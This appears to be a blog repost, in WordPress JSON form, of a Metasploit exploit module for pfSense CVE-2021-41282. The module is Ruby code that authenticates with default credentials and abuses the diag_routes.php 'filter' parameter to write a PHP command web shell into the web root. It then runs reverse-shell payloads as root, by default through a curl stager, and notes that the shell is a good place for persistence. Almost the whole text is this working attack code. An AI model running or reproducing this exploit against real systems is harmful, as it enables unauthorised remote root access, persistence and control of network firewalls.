##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n
include Msf::Exploit::Remote::HttpClient
\ninclude Msf::Exploit::CmdStager
\ninclude Msf::Exploit::FileDropper
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n
def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘pfSense Diag Routes Web Shell Upload’,
\n‘Description’ => %q{
\nThis module exploits an arbitrary file creation vulnerability in the pfSense
\nHTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2
\nand can be exploited by an authenticated user if they have the
\n“WebCfg – Diagnostics: Routing tables” privilege.<\/p>\n
This module uses the vulnerability to create a web shell and execute payloads
\nwith root privileges.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘Abdel Adim “smaury” Oisfi of Shielder’, # vulnerability discovery
\n‘jbaines-r7’ # metasploit module
\n],
\n‘References’ => [
\n[‘CVE’, ‘2021-41282’],
\n[‘URL’, ‘https:\/\/www.shielder.it\/advisories\/pfsense-remote-command-execution\/’]\n],
\n‘DisclosureDate’ => ‘2022-02-23’,
\n‘Platform’ => [‘unix’, ‘bsd’],
\n‘Arch’ => [ARCH_CMD, ARCH_X64],
\n‘Privileged’ => true,
\n‘Targets’ => [
\n[
\n‘Unix Command’,
\n{
\n‘Platform’ => ‘unix’,
\n‘Arch’ => ARCH_CMD,
\n‘Type’ => :unix_cmd,
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘cmd\/unix\/reverse_openssl’
\n},
\n‘Payload’ => {
\n‘Append’ => ‘ & disown’
\n}
\n}
\n],
\n[
\n‘BSD Dropper’,
\n{
\n‘Platform’ => ‘bsd’,
\n‘Arch’ => [ARCH_X64],
\n‘Type’ => :bsd_dropper,
\n‘CmdStagerFlavor’ => [ ‘curl’ ],
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘bsd\/x64\/shell_reverse_tcp’
\n}
\n}
\n]\n],
\n‘DefaultTarget’ => 1,
\n‘DefaultOptions’ => {
\n‘RPORT’ => 443,
\n‘SSL’ => true
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n}
\n)
\n)
\nregister_options [
\nOptString.new(‘USERNAME’, [true, ‘Username to authenticate with’, ‘admin’]),
\nOptString.new(‘PASSWORD’, [true, ‘Password to authenticate with’, ‘pfsense’]),
\nOptString.new(‘WEBSHELL_NAME’, [false, ‘The name of the uploaded webshell. This value is random if left unset’, nil]),
\nOptBool.new(‘DELETE_WEBSHELL’, [true, ‘Indicates if the webshell should be deleted or not.’, true])
\n]\n
@webshell_uri = ‘\/’
\n@webshell_path = ‘\/usr\/local\/www\/’
\nend<\/p>\n
# Authenticate and attempt to exploit the diag_routes.php upload. Unfortunately,
\n# pfsense permissions can be so locked down that we have to try direct exploitation
\n# in order to determine vulnerability. A user can even be restricted from the
\n# dashboard (where other pfsense modules extract the version).
\ndef check
\n# Grab a CSRF token so that we can log in
\nres = send_request_cgi(‘method’ => ‘GET’, ‘uri’ => normalize_uri(target_uri.path, ‘\/index.php’))
\nreturn CheckCode::Unknown(“Didn’t receive a response from the target.”) unless res
\nreturn CheckCode::Unknown(“Unexpected HTTP response from index.php: #{res.code}”) unless res.code == 200
\nreturn CheckCode::Unknown(‘Could not find pfSense title html tag’) unless res.body.include?(‘<title>pfSense – Login’)<\/p>\n
\/var csrfMagicToken = “(?<csrf>sid:[a-z0-9,;:]+)”;\/ =~ res.body
\nreturn CheckCode::Unknown(‘Could not find CSRF token’) unless csrf<\/p>\n
# send the log in attempt
\nres = send_request_cgi(
\n‘uri’ => normalize_uri(target_uri.path, ‘\/index.php’),
\n‘method’ => ‘POST’,
\n‘vars_post’ => {
\n‘__csrf_magic’ => csrf,
\n‘usernamefld’ => datastore[‘USERNAME’],
\n‘passwordfld’ => datastore[‘PASSWORD’],
\n‘login’ => ”
\n}
\n)<\/p>\n
return CheckCode::Detected(‘No response to log in attempt.’) unless res
\nreturn CheckCode::Detected(‘Log in failed. User provided invalid credentials.’) unless res.code == 302<\/p>\n
# save the auth cookie for later user
\n@auth_cookies = res.get_cookies<\/p>\n
# attempt the exploit. Upload a random file to \/usr\/local\/www\/ with random contents
\nfilename = Rex::Text.rand_text_alpha(4..12)
\ncontents = Rex::Text.rand_text_alpha(16..32)
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/diag_routes.php’),
\n‘cookie’ => @auth_cookies,
\n‘encode_params’ => false,
\n‘vars_get’ => {
\n‘isAjax’ => ‘1’,
\n‘filter’ => “.*\/!d;};s\/Destination\/#{contents}\/;w+#{@webshell_path}#{filename}%0a%23”
\n}
\n})<\/p>\n
return CheckCode::Safe(‘No response to upload attempt.’) unless res
\nreturn CheckCode::Safe(“Exploit attempt did not receive 200 OK: #{res.code}”) unless res.code == 200<\/p>\n
# Validate the exploit was successful by requesting the uploaded file
\nres = send_request_cgi({ ‘method’ => ‘GET’, ‘uri’ => normalize_uri(target_uri.path, “\/#{filename}”), ‘cookie’ => @auth_cookies })
\nreturn CheckCode::Safe(‘No response to exploit validation check.’) unless res
\nreturn CheckCode::Safe(“Exploit validation check did not receive 200 OK: #{res.code}”) unless res.code == 200<\/p>\n
register_file_for_cleanup(“#{@webshell_path}#{filename}”)
\nCheckCode::Vulnerable()
\nend<\/p>\n
# Using the path traversal, upload a php webshell to the remote target
\ndef drop_webshell
\nwebshell_location = normalize_uri(target_uri.path, “#{@webshell_uri}#{@webshell_name}”)
\nprint_status(“Uploading webshell to #{webshell_location}”)<\/p>\n
# php_webshell = ‘<?php if(isset($_GET[“cmd”])) { system($_GET[“cmd”]); } ?>’
\nphp_shell = ‘\\\\x3c\\\\x3fphp+if($_GET[\\\\x22cmd\\\\x22])+\\\\x7b+system($_GET[\\\\x22cmd\\\\x22])\\\\x3b+\\\\x7d+\\\\x3f\\\\x3e’<\/p>\n
res = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/diag_routes.php’),
\n‘cookie’ => @auth_cookies,
\n‘encode_params’ => false,
\n‘vars_get’ => {
\n‘isAjax’ => ‘1’,
\n‘filter’ => “.*\/!d;};s\/Destination\/#{php_shell}\/;w+#{@webshell_path}#{@webshell_name}%0a%23”
\n}
\n})<\/p>\n
fail_with(Failure::Disconnected, ‘Connection failed’) unless res
\nfail_with(Failure::UnexpectedReply, “Unexpected HTTP status code #{res.code}”) unless res.code == 200<\/p>\n
# Test the web shell installed by echoing a random string and ensure it appears in the res.body
\nprint_status(‘Testing if web shell installation was successful’)
\nrand_data = Rex::Text.rand_text_alphanumeric(16..32)
\nres = execute_via_webshell(“echo #{rand_data}”)
\nfail_with(Failure::UnexpectedReply, ‘Web shell execution did not appear to succeed.’) unless res.body.include?(rand_data)
\nprint_good(“Web shell installed at #{webshell_location}”)<\/p>\n
# This is a great place to leave a web shell for persistence since it doesn’t require auth
\n# to touch it. By default, we’ll clean this up but the attacker has to option to leave it
\nif datastore[‘DELETE_WEBSHELL’]\nregister_file_for_cleanup(“#{@webshell_path}#{@webshell_name}”)
\nend
\nend<\/p>\n
# Executes commands via the uploaded webshell
\ndef execute_via_webshell(cmd)
\nif target[‘Type’] == :bsd_dropper
\n# the bsd dropper using the reverse shell payload + curl cmdstager doesn’t have a good
\n# way to force the payload to background itself (and thus allow the HTTP response to
\n# to return). So we hack it in ourselves. This identifies the ending file cleanup
\n# which should be right after executing the payload.
\ncmd = cmd.sub(‘;rm -f \/tmp\/’, ‘ & disown;rm -f \/tmp\/’)
\nend<\/p>\n
res = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, “#{@webshell_uri}#{@webshell_name}”),
\n‘vars_get’ => {
\n‘cmd’ => cmd
\n}
\n})<\/p>\n
fail_with(Failure::Disconnected, ‘Connection failed’) unless res
\nfail_with(Failure::UnexpectedReply, “Unexpected HTTP status code #{res.code}”) unless res.code == 200
\nres
\nend<\/p>\n
def execute_command(cmd, _opts = {})
\nexecute_via_webshell(cmd)
\nend<\/p>\n
def exploit
\n# create a randomish web shell name if the user doesn’t specify one
\n@webshell_name = datastore[‘WEBSHELL_NAME’] || “#{Rex::Text.rand_text_alpha(5..12)}.php”<\/p>\n
drop_webshell<\/p>\n
print_status(“Executing #{target.name} for #{datastore[‘PAYLOAD’]}”)
\ncase target[‘Type’]\nwhen :unix_cmd
\nexecute_command(payload.encoded)
\nwhen :bsd_dropper
\nexecute_cmdstager
\nend
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘pfSense Diag Routes Web Shell Upload’, ‘Description’ => %q{ This module exploits an arbitrary file creation vulnerability in the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21232","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21232"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21232\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}